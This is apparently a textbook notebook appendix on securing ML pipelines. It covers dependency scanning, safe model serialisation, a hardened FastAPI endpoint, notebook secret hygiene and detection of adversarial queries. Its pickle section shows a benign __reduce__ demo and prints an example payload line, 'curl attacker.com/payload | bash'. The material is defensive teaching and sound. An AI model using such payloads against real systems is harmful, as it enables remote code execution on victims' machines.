# Appendix H â€” MLSecOps: Securing the ML Pipeline
## *Python for AI/ML: A Complete Learning Journey*

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/timothy-watt/python-for-ai-ml/blob/main/APP_H_MLSecOps.ipynb)
&nbsp;&nbsp;[![Back to TOC](https://img.shields.io/badge/Back_to-Table_of_Contents-1B3A5C?style=flat-square)](https://colab.research.google.com/github/timothy-watt/python-for-ai-ml/blob/main/Python_for_AIML_TOC.ipynb)

---

**Best read after:** Chapter 11 (MLOps), Chapter 12 (Adversarial ML)

### What is MLSecOps?

**MLSecOps** = DevSecOps principles applied to the full ML lifecycle.
Where Chapter 12 covers *model-level* attacks (evasion, poisoning, extraction),
this appendix covers the *pipeline*: how an attacker compromises your ML system
before the model even runs â€” through the supply chain, the serialisation format,
the serving layer, and the experiment tracking infrastructure.

```
ML Lifecycle                    MLSecOps Concern
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€          â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
Data collection / storage  â”€â”€â”€â–º Data integrity, access control
Package installation       â”€â”€â”€â–º Supply chain: typosquatting, malicious deps
Model training             â”€â”€â”€â–º Secrets in notebooks, MLflow access control
Model serialisation        â”€â”€â”€â–º Pickle exploits (torch.load, joblib.load)
Model serving (FastAPI)    â”€â”€â”€â–º Auth, rate limiting, input validation, TLS
Monitoring                 â”€â”€â”€â–º Distinguishing drift from adversarial probing
CI/CD pipeline             â”€â”€â”€â–º Secrets management, pipeline integrity
```

### Learning Objectives

- Identify supply chain risks specific to ML projects
- Explain the pickle exploit and migrate to safe model serialisation
- Add authentication and input validation to a FastAPI ML endpoint
- Prevent credential leakage from Jupyter notebooks
- Distinguish data drift from adversarial query probing in monitoring
- Apply a security audit checklist to the full SO 2025 salary pipeline


---

## H.1 â€” The MLSecOps Framework

MLSecOps integrates security at every phase of the ML lifecycle â€” not as a
final review, but as a continuous practice baked into each workflow.

**Regulatory context (2025â€“2026):**

| Framework | Relevance to ML Security |
|-----------|-------------------------|
| **EU AI Act** (2024) | High-risk AI systems must document robustness, data governance, and security testing |
| **NIST AI RMF** | Govern, Map, Measure, Manage â€” security is a first-class risk category |
| **OWASP ML Top 10** | Canonical ML-specific threat taxonomy (covered in Chapter 12) |
| **SOC 2 / ISO 27001** | If you serve ML predictions externally, standard infosec controls apply |

**Shift-left principle:** security checks are cheap when caught early
(a pre-commit hook) and expensive when caught late (a production incident).

```
Cost of fixing a security issue:

  Design    Develop    Test    Deploy    Production
  $1x  â”€â”€â”€â–º $10x  â”€â”€â”€â–º $50x â”€â”€â–º $100x â”€â”€â–º $1000x
```

The sections below progress through the lifecycle from left (dependency install)
to right (production monitoring).


---

## H.2 â€” Supply Chain Security

Most ML projects install dozens of open-source packages â€” each one is a potential
entry point. Supply chain attacks target the packages themselves rather than
your code.

**Three supply chain attack vectors:**

**1. Typosquatting** â€” a malicious package with a name similar to a popular one:
`tourch` instead of `torch`, `scikit-learnm` instead of `scikit-learn`.
The malicious package installs a backdoor when `pip install`-ed.

**2. Dependency confusion** â€” if your private package registry and PyPI have
a package with the same name, pip may fetch the public (malicious) one if the
version number is higher. Most common in enterprise environments.

**3. Compromised legitimate package** â€” a maintainer account is hijacked and
a malicious version is published. The most dangerous vector because the
package name is exactly correct.


In [None]:
# H.2.1 -- Scanning dependencies for known vulnerabilities

# pip-audit scans installed packages against the Python Packaging Advisory Database
# Safety checks against a curated vulnerability database
!pip install pip-audit safety --quiet

import subprocess
import json as json_lib
import os
import hashlib
from pathlib import Path
from typing import Optional

print('Running pip-audit on current environment...')
result = subprocess.run(
    ['pip-audit', '--format', 'json', '--progress-spinner', 'off'],
    capture_output=True, text=True
)

if result.returncode == 0:
    try:
        audit_data = json_lib.loads(result.stdout)
        vulns = audit_data.get('vulnerabilities', [])
        if vulns:
            print(f'Found {len(vulns)} vulnerabilities:')
            for v in vulns[:5]:  # show first 5
                print(f'  {v.get("name")}: {v.get("id")} -- {v.get("description", "")[:60]}')
        else:
            print('No known vulnerabilities found.')
    except json_lib.JSONDecodeError:
        print(result.stdout[:500])
else:
    print('pip-audit output:')
    print(result.stdout[:500] or result.stderr[:500])

print()
print('Best practice: run pip-audit in your GitHub Actions CI workflow')
print('  Add to .github/workflows/ml_ci.yml:')
print('    - name: Security scan')
print('      run: pip-audit --strict')


In [None]:
# H.2.2 -- The pickle exploit: why torch.load() of untrusted models is dangerous

import pickle
import io

print('Understanding the pickle exploit:')
print('=' * 55)
print()
print('Python pickle is a serialisation format that executes arbitrary')
print('code during deserialisation. Any .pkl, .pt, or joblib file from')
print('an untrusted source can contain a payload that runs on your machine.')
print()

# Demonstrate a SAFE (benign) example of pickle code execution
# This is an educational demonstration -- the payload just prints a warning
class SafeDemo:
    """Safe demonstration that pickle executes code on load."""
    def __reduce__(self) -> tuple:
        # __reduce__ is called during serialisation
        # In a real exploit this would be: os.system, subprocess.call, etc.
        return (print, ('DEMO: This code ran automatically during pickle.load()',))

demo_bytes = pickle.dumps(SafeDemo())
print(f'Serialised payload: {len(demo_bytes)} bytes')
print('Loading...')
pickle.loads(demo_bytes)  # The print() executes on load
print()
print('In a real exploit, __reduce__ would call:')
print('  os.system("curl attacker.com/payload | bash")')
print('  subprocess.Popen(["python", "-c", "import socket; ..."])')
print()
print('Affected functions (NEVER use with untrusted files):')
for fn in ['pickle.load()', 'torch.load()', 'joblib.load()',
           'np.load(..., allow_pickle=True)', 'pd.read_pickle()']:
    print(f'  âš   {fn}')


In [None]:
# H.2.3 -- Safe alternatives: safetensors and weights_only

import torch
import torch.nn as nn

# Option 1: torch.load with weights_only=True (PyTorch >= 1.13)
# Only loads tensor data -- cannot execute arbitrary code
print('Safe loading with torch.load(..., weights_only=True):')
print()

# Create a simple model to demonstrate
class TinyModel(nn.Module):
    def __init__(self) -> None:
        super().__init__()
        self.fc = nn.Linear(10, 2)
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.fc(x)

model = TinyModel()

# Save state dict (safe -- just tensors, no code)
torch.save(model.state_dict(), '/tmp/safe_model.pt')

# Load safely
state = torch.load('/tmp/safe_model.pt', weights_only=True)
model_loaded = TinyModel()
model_loaded.load_state_dict(state)
print('  torch.load(..., weights_only=True): OK')
print('  Only tensor values loaded; no code execution possible.')
print()

# Option 2: safetensors (recommended for sharing models)
try:
    from safetensors.torch import save_file, load_file
    save_file(model.state_dict(), '/tmp/model.safetensors')
    state_safe = load_file('/tmp/model.safetensors')
    print('  safetensors: OK')
    print('  Zero-copy, memory-mapped, no pickle -- safest option.')
except ImportError:
    print('  safetensors not installed -- pip install safetensors')

print()
print('Migration checklist:')
rules = [
    ('torch.load(f)',                    'torch.load(f, weights_only=True)'),
    ('joblib.load(f)',                   'Only load from trusted sources; use checksums'),
    ('pickle.load(f)',                   'Replace with json.load() or safetensors'),
    ('np.load(f, allow_pickle=True)',    'np.load(f, allow_pickle=False)'),
]
for unsafe, safe in rules:
    print(f'  UNSAFE: {unsafe:<40}  SAFE: {safe}')


---

## H.3 â€” Securing the FastAPI Serving Layer

The Chapter 11 FastAPI salary prediction endpoint is fully functional but
not production-secure. This section adds the three most important security
controls: authentication, strict input validation, and security headers.

**The threat model for an ML API endpoint:**

| Threat | Without security | With security |
|--------|-----------------|---------------|
| Unauthenticated access | Anyone can query | API key / OAuth required |
| Input manipulation | Any payload accepted | Pydantic strict validation |
| Model extraction | Unlimited queries | Rate limiting + budget |
| Injection via input | Raw strings passed to model | Sanitised, typed inputs only |
| Information disclosure | Stack traces in errors | Generic 500 responses |


In [None]:
# H.3.1 -- Production-hardened FastAPI salary endpoint
# Extends the Chapter 11 endpoint with: API key auth, rate limiting,
# strict input validation, security headers, and safe error handling.

SECURE_API_CODE = '''
from fastapi import FastAPI, HTTPException, Depends, Request, status
from fastapi.security import APIKeyHeader
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import JSONResponse
from pydantic import BaseModel, Field, field_validator
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded
import os
import logging
import time
import hashlib
from typing import Optional

# â”€â”€ Configuration from environment (never hardcode secrets) â”€â”€â”€â”€â”€â”€â”€
API_KEY_HASH = os.environ.get("API_KEY_HASH")  # SHA-256 of the valid API key
# Generate: hashlib.sha256("your-secret-key".encode()).hexdigest()

# â”€â”€ Rate limiter: 60 requests/minute per IP â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
limiter = Limiter(key_func=get_remote_address)
app     = FastAPI(title="Salary Predictor", docs_url=None)  # disable /docs in prod
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)

# â”€â”€ Security headers middleware â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
@app.middleware("http")
async def add_security_headers(request: Request, call_next):
    response = await call_next(request)
    response.headers["X-Content-Type-Options"]  = "nosniff"
    response.headers["X-Frame-Options"]          = "DENY"
    response.headers["X-XSS-Protection"]         = "1; mode=block"
    response.headers["Strict-Transport-Security"] = "max-age=31536000"
    return response

# â”€â”€ API key authentication â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
api_key_header = APIKeyHeader(name="X-API-Key", auto_error=False)

async def verify_api_key(api_key: Optional[str] = Depends(api_key_header)):
    if not api_key:
        raise HTTPException(status_code=401, detail="API key required")
    # Compare hash -- never compare raw keys
    provided_hash = hashlib.sha256(api_key.encode()).hexdigest()
    if provided_hash != API_KEY_HASH:
        raise HTTPException(status_code=403, detail="Invalid API key")
    return api_key

# â”€â”€ Strict input schema â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
class DeveloperProfile(BaseModel):
    years_exp:    float = Field(..., ge=0, le=50,
                                description="Years of professional coding (0â€“50)")
    uses_python:  bool
    uses_sql:     bool
    uses_js:      bool
    uses_ai:      bool
    country:      str   = Field(..., min_length=2, max_length=60,
                                description="Country of residence")

    @field_validator("country")
    @classmethod
    def sanitise_country(cls, v: str) -> str:
        # Strip control characters and leading/trailing whitespace
        sanitised = "".join(c for c in v if c.isprintable()).strip()
        if len(sanitised) < 2:
            raise ValueError("Country must be at least 2 printable characters")
        return sanitised

# â”€â”€ Prediction endpoint â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
logger = logging.getLogger("salary_api")

@app.post("/predict", dependencies=[Depends(verify_api_key)])
@limiter.limit("60/minute")
async def predict_salary(request: Request, profile: DeveloperProfile):
    try:
        # model.predict() call here
        prediction = {"predicted_salary_usd": 95000, "confidence_interval": [72000, 118000]}
        logger.info("prediction served",
                    extra={"country": profile.country, "ts": time.time()})
        return prediction
    except Exception:
        # Never expose internal errors to the caller
        logger.exception("prediction error")
        raise HTTPException(status_code=500, detail="Prediction unavailable")

@app.get("/health")
async def health() -> dict:
    return {"status": "ok"}
'''

with open('/tmp/secure_salary_api.py', 'w') as f:
    f.write(SECURE_API_CODE.lstrip('\n'))
print('Secure FastAPI endpoint written to /tmp/secure_salary_api.py')
print()
print('Security controls added vs Chapter 11 baseline:')
controls = [
    ('API key authentication',    'Hashed key comparison via X-API-Key header'),
    ('Rate limiting',             '60 req/min per IP via slowapi'),
    ('Input validation',          'Pydantic Field constraints + custom validator'),
    ('Security headers',          'HSTS, X-Frame-Options, X-Content-Type-Options'),
    ('Error handling',            'Generic 500 -- no stack traces to callers'),
    ('Docs disabled in prod',     'docs_url=None removes /docs endpoint'),
    ('Structured logging',        'Append-only audit trail with timestamp'),
]
for control, detail in controls:
    print(f'  âœ“ {control:<30}  {detail}')


---

## H.4 â€” Securing Jupyter Notebooks and Experiment Tracking

Jupyter notebooks are one of the most common sources of credential leaks
in ML projects. Output cells, version control history, and MLflow artefacts
are all potential disclosure vectors.


In [None]:
# H.4.1 -- Credential leak vectors and defences

import ast as py_ast
import re
from pathlib import Path

print('Common credential leak patterns in ML notebooks:')
print('=' * 55)

LEAK_PATTERNS = [
    ('Hardcoded API key',
     'api_key = "sk-proj-abc123"',
     'os.environ.get("OPENAI_API_KEY") or Colab Secrets'),
    ('AWS credentials in code',
     'boto3.client("s3", aws_access_key_id="AKIA...")',
     'AWS IAM roles / instance profiles; never hardcode'),
    ('Database password',
     'conn = psycopg2.connect(password="MyP@ss")',
     'Environment variable: os.environ["DB_PASSWORD"]'),
    ('MLflow tracking URI with credentials',
     'mlflow.set_tracking_uri("http://user:pass@mlflow.io")',
     'MLFLOW_TRACKING_USERNAME / MLFLOW_TRACKING_PASSWORD env vars'),
    ('HuggingFace token',
     'login(token="hf_abcdefg")',
     'HUGGING_FACE_HUB_TOKEN env var or Colab Secrets'),
]

for title, bad, good in LEAK_PATTERNS:
    print(f'\n  {title}:')
    print(f'  UNSAFE: {bad}')
    print(f'  SAFE:   {good}')

print()
print('In Google Colab: use the ðŸ”‘ Secrets panel (left sidebar)')
print('Access in code: from google.colab import userdata')
print('                api_key = userdata.get("OPENAI_API_KEY")')
print()
print('Secrets stored in Colab are:')
print('  âœ“ Not saved in the .ipynb file')
print('  âœ“ Not visible in GitHub if you commit the notebook')
print('  âœ“ Persistent across sessions (tied to your Google account)')


In [None]:
# H.4.2 -- nbstripout: strip outputs before committing
# nbstripout is a git filter that automatically removes cell outputs
# (including printed API keys, data previews with PII, etc.)
# from notebooks before they are committed to git.

NBSTRIPOUT_SETUP = '''
# Install nbstripout (one-time setup per repo)
pip install nbstripout

# Register as a git filter in the current repo
nbstripout --install

# This adds to .git/config:
# [filter "nbstripout"]
#   clean = nbstripout
#   smudge = cat
#   required = true

# Add to .gitattributes (commit this file):
echo '*.ipynb filter=nbstripout' >> .gitattributes
git add .gitattributes
git commit -m 'chore: add nbstripout filter'

# From now on: git add notebook.ipynb automatically strips outputs
# before the content reaches git history.
'''

PRECOMMIT_CONFIG = '''
# .pre-commit-config.yaml
# Run: pip install pre-commit && pre-commit install

repos:
  - repo: https://github.com/kynan/nbstripout
    rev: 0.7.1
    hooks:
      - id: nbstripout

  - repo: https://github.com/Yelp/detect-secrets
    rev: v1.4.0
    hooks:
      - id: detect-secrets     # blocks commits containing secrets
        args: ["--baseline", ".secrets.baseline"]

  - repo: https://github.com/pypa/pip-audit
    rev: v2.7.3
    hooks:
      - id: pip-audit          # blocks commits if new vulnerabilities found
'''

with open('/tmp/nbstripout_setup.sh', 'w') as f:
    f.write(NBSTRIPOUT_SETUP.lstrip('\n'))
with open('/tmp/.pre-commit-config.yaml', 'w') as f:
    f.write(PRECOMMIT_CONFIG.lstrip('\n'))

print('Files written:')
print('  /tmp/nbstripout_setup.sh    -- setup instructions')
print('  /tmp/.pre-commit-config.yaml -- pre-commit config with 3 hooks')
print()
print('The three pre-commit hooks together prevent:')
print('  nbstripout     â†’ cell outputs (printed secrets, data previews)')
print('  detect-secrets â†’ hardcoded credentials in code')
print('  pip-audit      â†’ newly introduced vulnerable dependencies')


---

## H.5 â€” Monitoring for Security Events

Chapter 11 covers drift monitoring for model performance. Security monitoring
extends this to detect *adversarial behaviour* â€” patterns that suggest an attacker
is probing your system rather than using it legitimately.

**Key distinction: drift vs adversarial probing**

| Signal | Drift | Adversarial probing |
|--------|-------|---------------------|
| Input distribution shift | Gradual, calendar-aligned | Sudden, systematic |
| Query volume | Increases with business growth | Spike from few IPs |
| Input diversity | Reflects real-world variation | Exhaustive grid of combinations |
| Feature values | Near historical range | Often at extremes or boundaries |
| Timing | Business hours | Can be overnight / off-hours |


In [None]:
# H.5.1 -- Adversarial query pattern detection

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats

np.random.seed(42)

def generate_query_log(
    n_legit:     int,
    n_adversarial: int,
    seed:        int = 42,
) -> pd.DataFrame:
    """
    Simulate an API query log with mixed legitimate and adversarial queries.
    Legitimate queries cluster near typical values.
    Adversarial queries are more uniform/systematic.
    """
    rng = np.random.default_rng(seed)

    # Legitimate queries: realistic developer profiles
    legit = pd.DataFrame({
        'years_exp':    rng.lognormal(1.8, 0.6, n_legit).clip(0, 35),
        'uses_python':  rng.choice([0, 1], n_legit, p=[0.35, 0.65]),
        'uses_sql':     rng.choice([0, 1], n_legit, p=[0.45, 0.55]),
        'query_gap_s':  rng.exponential(30, n_legit),   # seconds between queries
        'source_ip':    rng.choice([f'10.0.{i}.{j}'
                                    for i in range(1, 20)
                                    for j in range(1, 20)], n_legit),
        'is_adversarial': False,
    })

    # Adversarial queries: systematic grid scan from few IPs
    years_grid  = np.linspace(0, 35, n_adversarial)
    adv = pd.DataFrame({
        'years_exp':    years_grid,
        'uses_python':  np.tile([0, 1], n_adversarial)[:n_adversarial],
        'uses_sql':     np.tile([0, 1], n_adversarial)[:n_adversarial],
        'query_gap_s':  rng.uniform(0.1, 0.5, n_adversarial),  # fast, uniform
        'source_ip':    rng.choice(['192.168.1.1', '192.168.1.2'], n_adversarial),
        'is_adversarial': True,
    })

    return pd.concat([legit, adv], ignore_index=True).sample(
        frac=1, random_state=seed).reset_index(drop=True)


log = generate_query_log(n_legit=800, n_adversarial=200)
print(f'Query log: {len(log):,} queries ({log["is_adversarial"].sum()} adversarial)')

# Detection signals

# Signal 1: per-IP query rate
ip_counts = log.groupby('source_ip').size()
HIGH_VOLUME_THRESHOLD = ip_counts.quantile(0.95)
flagged_ips = ip_counts[ip_counts > HIGH_VOLUME_THRESHOLD]

# Signal 2: query gap (adversarial = fast and regular)
log['gap_zscore'] = np.abs(stats.zscore(log['query_gap_s']))

# Signal 3: input feature uniformity (adversarial = systematic grid)
log['years_rounded'] = log['years_exp'].round(1)
years_counts = log['years_rounded'].value_counts()
# Adversarial grid produces very uniform distribution; legit does not
years_entropy_all  = stats.entropy(years_counts / len(log))

fig, axes = plt.subplots(1, 3, figsize=(15, 4))

# Plot 1: years_exp distribution by source type
for label, color in [('Legitimate', '#2E75B6'), ('Adversarial', '#C0392B')]:
    is_adv = label == 'Adversarial'
    subset = log[log['is_adversarial'] == is_adv]
    axes[0].hist(subset['years_exp'], bins=30, alpha=0.6, color=color,
                 label=f'{label} (n={len(subset)})')
axes[0].set_xlabel('Years Experience in Query')
axes[0].set_ylabel('Count')
axes[0].set_title('Feature Distribution: Legit vs Adversarial')
axes[0].legend()

# Plot 2: query gap distribution
for label, color in [('Legitimate', '#2E75B6'), ('Adversarial', '#C0392B')]:
    is_adv = label == 'Adversarial'
    axes[1].hist(log[log['is_adversarial'] == is_adv]['query_gap_s'].clip(0, 120),
                 bins=30, alpha=0.6, color=color, label=label)
axes[1].set_xlabel('Seconds Between Queries')
axes[1].set_title('Query Timing: Fast+Regular = Suspicious')
axes[1].legend()

# Plot 3: per-IP query volume
top_ips = ip_counts.nlargest(20)
colours = ['#C0392B' if c > HIGH_VOLUME_THRESHOLD else '#2E75B6'
           for c in top_ips]
axes[2].bar(range(len(top_ips)), top_ips.values, color=colours)
axes[2].axhline(HIGH_VOLUME_THRESHOLD, color='orange', linestyle='--',
                label=f'Flag threshold ({HIGH_VOLUME_THRESHOLD:.0f})')
axes[2].set_xlabel('IP rank (top 20)')
axes[2].set_ylabel('Query count')
axes[2].set_title('Per-IP Volume: Red = Flagged')
axes[2].legend()

plt.suptitle('Security Monitoring Signals', fontsize=13, fontweight='bold')
plt.tight_layout()
plt.show()

print(f'High-volume IPs flagged: {len(flagged_ips)}')
print(f'Top flagged IP: {flagged_ips.idxmax()} ({flagged_ips.max()} queries)')


---

## Appendix H Summary â€” MLSecOps Audit Checklist

Apply this checklist to the SO 2025 salary pipeline (or any ML project)
before moving to production.

### Supply Chain
- [ ] `pip-audit` passes with zero critical vulnerabilities
- [ ] `requirements.txt` pins exact versions (`torch==2.5.1`, not `torch>=2.0`)
- [ ] No `torch.load()` calls without `weights_only=True`
- [ ] Model files from HuggingFace Hub or public sources verified by SHA-256 hash

### Credentials and Secrets
- [ ] Zero hardcoded API keys, passwords, or tokens in any `.ipynb` or `.py` file
- [ ] `nbstripout` installed as a git filter
- [ ] `detect-secrets` pre-commit hook enabled
- [ ] All secrets loaded from environment variables or a secrets manager

### Model Serving
- [ ] FastAPI endpoint requires API key authentication
- [ ] Rate limiting enforced (e.g., 60 req/min per IP)
- [ ] All input fields validated with Pydantic `Field` constraints
- [ ] Errors return generic messages (no stack traces to callers)
- [ ] Security headers set (HSTS, X-Frame-Options, X-Content-Type-Options)
- [ ] API docs (`/docs`) disabled in production

### Experiment Tracking (MLflow)
- [ ] MLflow server is not publicly accessible (firewall / VPN required)
- [ ] MLflow authentication enabled if using managed server
- [ ] No credentials in `mlflow.set_tracking_uri()` calls

### Monitoring
- [ ] Per-IP query volume monitored with alerting threshold
- [ ] Query timing pattern detection running
- [ ] Input feature distribution compared to training distribution (PSI from Ch 11)
- [ ] All prediction requests logged to an append-only audit trail

### Red Team (Ch 12)
- [ ] At least one adversarial evasion test run per model update
- [ ] LLM-based components tested with structured red team framework
- [ ] Findings documented in model card (Ch 10)

---

### Key Takeaways

- **Pickle is dangerous.** Any `torch.load()`, `joblib.load()`, or `pickle.load()` of an untrusted file can execute arbitrary code. Always use `weights_only=True` or `safetensors`.

- **Secrets belong in environment variables, not code.** A secret committed to git exists in history forever even after deletion. `nbstripout` + `detect-secrets` together make it structurally difficult to accidentally commit a credential.

- **Authentication and rate limiting are not optional for production APIs.** An unauthenticated, rate-unlimited ML endpoint is an invitation for model extraction attacks.

- **Security monitoring is distinct from performance monitoring.** Drift monitoring (Ch 11) detects natural distribution shift. Security monitoring looks for systematic, adversarial patterns â€” uniform feature grids, high-volume single IPs, unusually fast query rates.

- **Shift left.** Pre-commit hooks (nbstripout, detect-secrets, pip-audit) catch security issues before they reach git history. The earlier a vulnerability is caught, the cheaper it is to fix.

---

*End of Appendix H â€” Python for AI/ML*  
[![Back to TOC](https://img.shields.io/badge/Back_to-Table_of_Contents-1B3A5C?style=flat-square)](https://colab.research.google.com/github/timothy-watt/python-for-ai-ml/blob/main/Python_for_AIML_TOC.ipynb)
